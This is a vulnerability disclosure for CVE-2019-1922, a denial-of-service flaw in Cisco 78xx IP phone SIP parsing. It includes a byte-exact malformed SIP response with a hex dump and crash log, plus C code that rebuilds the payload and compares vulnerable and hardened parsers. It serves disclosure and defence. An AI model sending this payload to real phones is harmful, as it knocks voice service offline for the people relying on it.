Cisco IP Phone SIP Denial of Service Vulnerability

09 July 2019

CVE
CVE-2019-1922

CVSS SCORE
5.3 (AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H)

XID
XL-19-015

AFFECTED VENDORS
Cisco Systems

CREDIT
Thomas Sabono - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY

The SIP stack of the Cisco IP Phone does not safely parse the headers of an incoming SIP message. A malformed header in a message sent to the phone leaves the internal message structure improperly set, and a routine that later consumes that structure dereferences a NULL pointer, crashing the SIP task. An attacker who can answer the phone's SIP requests, for instance by being the host the phone registers with, can use this to cause a denial of service (DoS). The crash shown below is a NULL pointer dereference in strcmp() and the CVSS vector scores no confidentiality or integrity impact, so the demonstrated impact is denial of service; remote code execution is not shown.

 

TECHNICAL DETAILS

The Cisco IP Phone SIP stack (libsip.so) does not safely parse the headers of a SIP message. While splitting the message into header lines, line terminators are not properly checked: a header value containing bare carriage-return, line-feed or NUL bytes in place of a CRLF terminator is not rejected. Parsing stops with the fields of the sipMessage_t structure in libsip.so improperly set, and a routine that later consumes the structure dereferences a NULL pointer.

 

PROOF OF CONCEPT

This vulnerability can be triggered by pointing the Cisco IP Phone at an attacker-controlled host as its router via DHCP. When the phone boots, it sends SIP requests to initialise itself; two types of request are sent, REGISTER and REFER. Replying to the REGISTER request with a response whose CSeq header is malformed triggers a denial of service.

The 200 OK response to the REGISTER request shown below triggers the vulnerability:

 

 

SIP/2.0 200 OK
Content-Length: 0
Via: SIP/2.0/UDP 10.0.42.9:5060;branch=z9hG4bK7e2c1bae
From: <sip:208@10.0.42.1>;tag=b07d47d0ca8300056b867fe2-71d5dce9
Expires: 3600
To: <sip:208@10.0.42.1>
Contact: <sip:208@10.0.42.9:5060;transport=udp>;+sip.instance="<urn:uuid:00000000-0000-0000-0000-b07d47d0ca83>";+u.sip!devicename.ccm.cisco.com="SEPB07D47D0CA83";+u.sip!model.ccm.cisco.com="621"
CSeq: 102 W{35}\rW{29}\rW{8} W{24}\rW{25}\0W{25}\tW{5}\nW{22}\0W{67}\nW{9}\tW{122}
Max-Forwards: 69
Call-ID: b07d47d0-ca830002-60214816-504b36b9@10.0.42.9

(Each line above ends in CRLF and the message ends with an empty line. Inside the CSeq value, W{n} stands for a run of n 'W' (0x57) bytes and \r, \n, \t and \0 for single 0x0D, 0x0A, 0x09 and 0x00 bytes; the exact bytes are in the hexadecimal dump below.)


0x0000: 53 49 50 2F 32 2E 30 20 32 30 30 20 4F 4B 0D 0A     S I P / 2 . 0   2 0 0   O K . .

0x0010: 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20     C o n t e n t - L e n g t h : 

0x0020: 30 0D 0A 56 69 61 3A 20 53 49 50 2F 32 2E 30 2F     0 . . V i a :   S I P / 2 . 0 /

0x0030: 55 44 50 20 31 30 2E 30 2E 34 32 2E 39 3A 35 30     U D P   1 0 . 0 . 4 2 . 9 : 5 0

0x0040: 36 30 3B 62 72 61 6E 63 68 3D 7A 39 68 47 34 62     6 0 ; b r a n c h = z 9 h G 4 b

0x0050: 4B 37 65 32 63 31 62 61 65 0D 0A 46 72 6F 6D 3A     K 7 e 2 c 1 b a e . . F r o m :

0x0060: 20 3C 73 69 70 3A 32 30 38 40 31 30 2E 30 2E 34       < s i p : 2 0 8 @ 1 0 . 0 . 4

0x0070: 32 2E 31 3E 3B 74 61 67 3D 62 30 37 64 34 37 64     2 . 1 > ; t a g = b 0 7 d 4 7 d

0x0080: 30 63 61 38 33 30 30 30 35 36 62 38 36 37 66 65     0 c a 8 3 0 0 0 5 6 b 8 6 7 f e

0x0090: 32 2D 37 31 64 35 64 63 65 39 0D 0A 45 78 70 69     2 - 7 1 d 5 d c e 9 . . E x p i

0x00A0: 72 65 73 3A 20 33 36 30 30 0D 0A 54 6F 3A 20 3C     r e s :   3 6 0 0 . . T o :   <

0x00B0: 73 69 70 3A 32 30 38 40 31 30 2E 30 2E 34 32 2E     s i p : 2 0 8 @ 1 0 . 0 . 4 2 .

0x00C0: 31 3E 0D 0A 43 6F 6E 74 61 63 74 3A 20 3C 73 69     1 > . . C o n t a c t :   < s i

0x00D0: 70 3A 32 30 38 40 31 30 2E 30 2E 34 32 2E 39 3A     p : 2 0 8 @ 1 0 . 0 . 4 2 . 9 :

0x00E0: 35 30 36 30 3B 74 72 61 6E 73 70 6F 72 74 3D 75     5 0 6 0 ; t r a n s p o r t = u

0x00F0: 64 70 3E 3B 2B 73 69 70 2E 69 6E 73 74 61 6E 63     d p > ; + s i p . i n s t a n c

0x0100: 65 3D 22 3C 75 72 6E 3A 75 75 69 64 3A 30 30 30     e = " < u r n : u u i d : 0 0 0

0x0110: 30 30 30 30 30 2D 30 30 30 30 2D 30 30 30 30 2D     0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 -

0x0120: 30 30 30 30 2D 62 30 37 64 34 37 64 30 63 61 38     0 0 0 0 - b 0 7 d 4 7 d 0 c a 8

0x0130: 33 3E 22 3B 2B 75 2E 73 69 70 21 64 65 76 69 63     3 > " ; + u . s i p ! d e v i c

0x0140: 65 6E 61 6D 65 2E 63 63 6D 2E 63 69 73 63 6F 2E     e n a m e . c c m . c i s c o .

0x0150: 63 6F 6D 3D 22 53 45 50 42 30 37 44 34 37 44 30     c o m = " S E P B 0 7 D 4 7 D 0

0x0160: 43 41 38 33 22 3B 2B 75 2E 73 69 70 21 6D 6F 64     C A 8 3 " ; + u . s i p ! m o d

0x0170: 65 6C 2E 63 63 6D 2E 63 69 73 63 6F 2E 63 6F 6D     e l . c c m . c i s c o . c o m

0x0180: 3D 22 36 32 31 22 0D 0A 43 53 65 71 3A 20 31 30     = " 6 2 1 " . . C S e q :   1 0

0x0190: 32 20 57 57 57 57 57 57 57 57 57 57 57 57 57 57     2   W W W W W W W W W W W W W W

0x01A0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x01B0: 57 57 57 57 57 0D 57 57 57 57 57 57 57 57 57 57     W W W W W . W W W W W W W W W W

0x01C0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x01D0: 57 57 57 0D 57 57 57 57 57 57 57 57 20 57 57 57     W W W . W W W W W W W W   W W W

0x01E0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x01F0: 57 57 57 57 57 0D 57 57 57 57 57 57 57 57 57 57     W W W W W . W W W W W W W W W W

0x0200: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 00     W W W W W W W W W W W W W W W .

0x0210: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0220: 57 57 57 57 57 57 57 57 57 09 57 57 57 57 57 0A     W W W W W W W W W . W W W W W .

0x0230: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0240: 57 57 57 57 57 57 00 57 57 57 57 57 57 57 57 57     W W W W W W . W W W W W W W W W

0x0250: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0260: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0270: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0280: 57 57 57 57 57 57 57 57 57 57 0A 57 57 57 57 57     W W W W W W W W W W . W W W W W

0x0290: 57 57 57 57 09 57 57 57 57 57 57 57 57 57 57 57     W W W W . W W W W W W W W W W W

0x02A0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02B0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02C0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02D0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02E0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02F0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0300: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 0D     W W W W W W W W W W W W W W W .

0x0310: 0A 4D 61 78 2D 46 6F 72 77 61 72 64 73 3A 20 36     . M a x - F o r w a r d s :   6

0x0320: 39 0D 0A 43 61 6C 6C 2D 49 44 3A 20 62 30 37 64     9 . . C a l l - I D :   b 0 7 d

0x0330: 34 37 64 30 2D 63 61 38 33 30 30 30 32 2D 36 30     4 7 d 0 - c a 8 3 0 0 0 2 - 6 0

0x0340: 32 31 34 38 31 36 2D 35 30 34 62 33 36 62 39 40     2 1 4 8 1 6 - 5 0 4 b 3 6 b 9 @

0x0350: 31 30 2E 30 2E 34 32 2E 39 0D 0A 0D 0A              1 0 . 0 . 4 2 . 9 . . . .

Figure 1 – Malicious REGISTER response with hexadecimal representation

The bytes that matter are the ones embedded in the CSeq value: bare carriage returns (0x0D at offsets 0x1B5, 0x1D3 and 0x1F5), NUL bytes (0x00 at 0x20F and 0x246), tabs (0x09 at 0x229 and 0x294) and bare line feeds (0x0A at 0x22F and 0x28A), none of which forms a CRLF line terminator; the header is only terminated by the CRLF at 0x30F. These are the origin of the vulnerability. Sending this response as the reply to the REGISTER request coming from the Cisco IP Phone produces the following crash dump, in which strcmp() in libc is entered with R0 (its first argument) equal to 0 and FAULT = 0, called from sip_sm_determine_ccb in libsip.so on the sipSPISendErrorResponse path:

 

************************************************************

*             Dumping Registers                            *

************************************************************

R0 =   00000000

R1 =   B3FF68F0

R2 =   B3FF68F0

R3 =   B3FF68F0

R4 =   B3FA9850

R5 =   FFFFFFFF

R6 =   00000000

R7 =   00000152

R8 =   00000000

R9 =   B634B704

R10 = B634B704

FP =   B303A274

IP =   B3FDF440

LR =   B3E4EA78

PC =   470E43E0

CPSR = 80000010

FAULT = 00000000

STACK = B303A000

dump stack AAPCS enter

-----------failing frame --------------

/lib/libc.so.6(strcmp+0) [0x470e43e0]

---------------------------------------

#0  fp=0xb3e4e0e0 base=0xb3c85000, in sip_sm_determine_ccb at /usr/lib/libsip.so:0xb3e4e0d0  offset=0x001c90e0

#1  fp=0xb3e61ccc base=0xb3c85000, in sipSPISendErrorResponse at /usr/lib/libsip.so:0xb3e61cbc  offset=0x001dcccc

#2  fp=0xb3eab714 base=0xb3c85000, in (null) at /usr/lib/libsip.so:0x00000000  offset=0x00226714

#3  fp=0xb3eaab30 base=0xb3c85000, in SIPTaskProcessUDPMessage at /usr/lib/libsip.so:0xb3eaab20  offset=0x00225b30

#4  fp=0xb3e76be8 base=0xb3c85000, in sip_platform_udp_read_socket at /usr/lib/libsip.so:0xb3e76bd8  offset=0x001f1be8

#5  fp=0xb3ec4f48 base=0xb3c85000, in SIPTask at /usr/lib/libsip.so:0xb3ec4f38  offset=0x0023ff48

#6  fp=0x47138538 base=0x47070000, in clone at /lib/libc.so.6:0x471384b0  offset=0x000c8538

#7  fp=0xb6c0b218 base=0xb6bfc000, in (null) at /bin/libj9jit24.so:0x00000000  offset=0x0000f218

******unknown addr *** offset=0x2ae12000

****unable to access memory***

Figure 2 – Crash dump triggered by a malicious REGISTER SIP reply

Because the flaw is in the generic parsing of header lines rather than in the handling of CSeq, it may be possible to trigger the crash through any header and with any SIP request or response, not only through the CSeq header of a REGISTER response.
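The header-parsing flaw described under TECHNICAL DETAILS and exercised by the response in Figure 1, as an added worked example in C (this is not code from xen1thLabs or from Cisco's libsip.so). It contains a deliberately small SIP header parser in two forms: a vulnerable one that ends a line at any CR or LF and hands back a half-filled message structure when it meets a line it cannot parse, and a hardened one that requires CRLF terminators and rejects bare CR, LF and NUL bytes in a header line. The program rebuilds the 861-byte response of Figure 1 from the run lengths in the hexadecimal dump, so the payload is the page's own; the sip_msg_t structure, the function names, and the choice of the never-parsed Call-ID field as the NULL operand of strcmp() in a stand-in for sip_sm_determine_ccb are assumptions made for the illustration, not Cisco's internals.

```c
/* Added example, not code from xen1thLabs or Cisco's libsip.so: a small SIP header
 * parser in a vulnerable and a hardened form, run over a message built here to match
 * Figure 1 byte for byte.  sip_msg_t, the function names and the failure path are
 * assumptions fitted to the crash dump (strcmp() entered with R0 == 0), not Cisco's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the page's sipMessage_t: call_id/cseq stay NULL until that header is parsed */
typedef struct { char *call_id, *cseq; int malformed; } sip_msg_t;
static char *dupn(const char *s, size_t n) { char *p = malloc(n + 1); if (p) { memcpy(p, s, n); p[n] = 0; } return p; }
void sip_msg_free(sip_msg_t *m) { free(m->call_id); free(m->cseq); m->call_id = m->cseq = NULL; }

/* Record one "Name: value" line; only the two headers the example needs are kept. */
static void store_header(sip_msg_t *m, const char *line, size_t len)
{
    const char *colon = memchr(line, ':', len), *v;
    if (!colon) { m->malformed = 1; return; }                     /* no "Name:" on this line */
    for (v = colon + 1; v < line + len && *v == ' '; v++) {}
    if (colon - line == 7 && memcmp(line, "Call-ID", 7) == 0) m->call_id = dupn(v, line + len - v);
    if (colon - line == 4 && memcmp(line, "CSeq", 4) == 0)    m->cseq    = dupn(v, line + len - v);
}

/* Vulnerable parse: a line ends at the first CR *or* LF, so a bare CR inside a value splits
 * it; the parser gives up at the first line it cannot parse and hands back the half-filled
 * struct.  Headers after that line (here Max-Forwards and Call-ID) are never seen. */
int parse_unsafe(sip_msg_t *m, const unsigned char *buf, size_t len)
{
    size_t i = 0, line = 0;
    while (i < len) {
        size_t start = i;
        while (i < len && buf[i] != '\r' && buf[i] != '\n') i++;
        if (line++ > 0) store_header(m, (const char *)buf + start, i - start);
        if (m->malformed) return -1;                               /* Call-ID is still NULL here */
        while (i < len && (buf[i] == '\r' || buf[i] == '\n')) i++;
    }
    return 0;
}

/* Hardened parse: every line must end in exactly CRLF and may contain no bare CR, bare
 * LF or NUL; any violation rejects the whole message before anything downstream runs. */
int parse_safe(sip_msg_t *m, const unsigned char *buf, size_t len)
{
    size_t i = 0, line = 0;
    while (i < len) {
        size_t start = i;
        while (i < len && buf[i] != '\r' && buf[i] != '\n' && buf[i] != '\0') i++;
        if (i + 1 >= len || buf[i] != '\r' || buf[i + 1] != '\n') { m->malformed = 1; return -1; }
        if (i == start) return 0;                                  /* CRLF CRLF: end of headers */
        if (line++ > 0) store_header(m, (const char *)buf + start, i - start);
        if (m->malformed) return -1;
        i += 2;
    }
    m->malformed = 1; return -1;                                   /* no terminating empty line */
}

/* Stand-in for sip_sm_determine_ccb(): match the message to a call by Call-ID.  The
 * unguarded form is the shape of Figure 2: strcmp() entered with a NULL first argument. */
int determine_ccb_unguarded(const sip_msg_t *m, const char *id) { return strcmp(m->call_id, id) == 0; }
int determine_ccb_guarded(const sip_msg_t *m, const char *id) { return m->call_id && strcmp(m->call_id, id) == 0; }

/* Builds the 861-byte response of Figure 1.  With malformed != 0 the CSeq value is the 'W'
 * runs split by the bare CR, NUL, TAB and LF bytes the hex dump shows at offsets
 * 0x192..0x30E; otherwise it is a well-formed "102 REGISTER". */
size_t build_response(unsigned char *out, size_t cap, int malformed)
{
    static const char head[] = "SIP/2.0 200 OK\r\nContent-Length: 0\r\n"
        "Via: SIP/2.0/UDP 10.0.42.9:5060;branch=z9hG4bK7e2c1bae\r\n"
        "From: <sip:208@10.0.42.1>;tag=b07d47d0ca8300056b867fe2-71d5dce9\r\n"
        "Expires: 3600\r\nTo: <sip:208@10.0.42.1>\r\n"
        "Contact: <sip:208@10.0.42.9:5060;transport=udp>;"
        "+sip.instance=\"<urn:uuid:00000000-0000-0000-0000-b07d47d0ca83>\";"
        "+u.sip!devicename.ccm.cisco.com=\"SEPB07D47D0CA83\";"
        "+u.sip!model.ccm.cisco.com=\"621\"\r\nCSeq: 102 ";
    static const char tail[] =
        "\r\nMax-Forwards: 69\r\nCall-ID: b07d47d0-ca830002-60214816-504b36b9@10.0.42.9\r\n\r\n";
    static const struct { size_t n; int sep; } runs[] = {         /* 'W' run, byte after it */
        {35,'\r'},{29,'\r'},{8,' '},{24,'\r'},{25,'\0'},{25,'\t'},
        {5,'\n'},{22,'\0'},{67,'\n'},{9,'\t'},{122,-1} };
    if (cap < sizeof head + sizeof tail + 381) return 0;           /* 381 bytes of CSeq value */
    size_t n = sizeof head - 1; memcpy(out, head, n);
    if (!malformed) { memcpy(out + n, "REGISTER", 8); n += 8; }
    else for (size_t r = 0; r < sizeof runs / sizeof runs[0]; r++) {
        memset(out + n, 'W', runs[r].n); n += runs[r].n;
        if (runs[r].sep >= 0) out[n++] = (unsigned char)runs[r].sep;
    }
    memcpy(out + n, tail, sizeof tail - 1);
    return n + sizeof tail - 1;
}

int main(void)
{
    unsigned char buf[1024]; sip_msg_t m = {0}, s = {0};
    size_t n = build_response(buf, sizeof buf, 1);
    int rc = parse_unsafe(&m, buf, n);        /* after this, determine_ccb_unguarded(&m, ..) faults */
    printf("vulnerable parser: rc=%d Call-ID=%s\n", rc, m.call_id ? m.call_id : "(null)");
    rc = parse_safe(&s, buf, n);
    printf("hardened parser:   rc=%d malformed=%d\n", rc, s.malformed);
    sip_msg_free(&m); sip_msg_free(&s);
    return 0;
}
```

Build with cc -Wall -o sip_parse sip_parse.c and run it. The vulnerable parser returns -1 with CSeq cut to "102 " plus the first 35 W bytes and Call-ID never set, which is the state in which a later strcmp() on that field is the fault of Figure 2 (R0 = 0, FAULT = 0); the hardened parser rejects the message at the first bare CR, before any field can be consumed. The same framing check is worth enforcing on any SIP proxy or SBC in front of the phones: a header line that is not terminated by CRLF, or that contains a NUL byte, should be dropped rather than forwarded.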

 

AFFECTED SYSTEMS

Cisco IP Phone CP-7811 / CP-7821 / CP-7841 / CP-7861
Version: sip78xx.11-5-1-1-18
Firmware Revision: sboot2.78xx.11-5-1-18.sbn
Software Revision: sip78xx.11-5-1-18.loads

 

SOLUTION

Contact the vendor for a patch. Cisco's advisory for this issue is at:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190703-ip-phone-sip-dos

 

DISCLOSURE TIMELINE


05/24/2019: Contacted Cisco Systems requesting disclosure coordination

05/24/2019: Provided vulnerability details

07/03/2019: Cisco Systems published advisory

07/09/2019: xen1thLabs public disclosure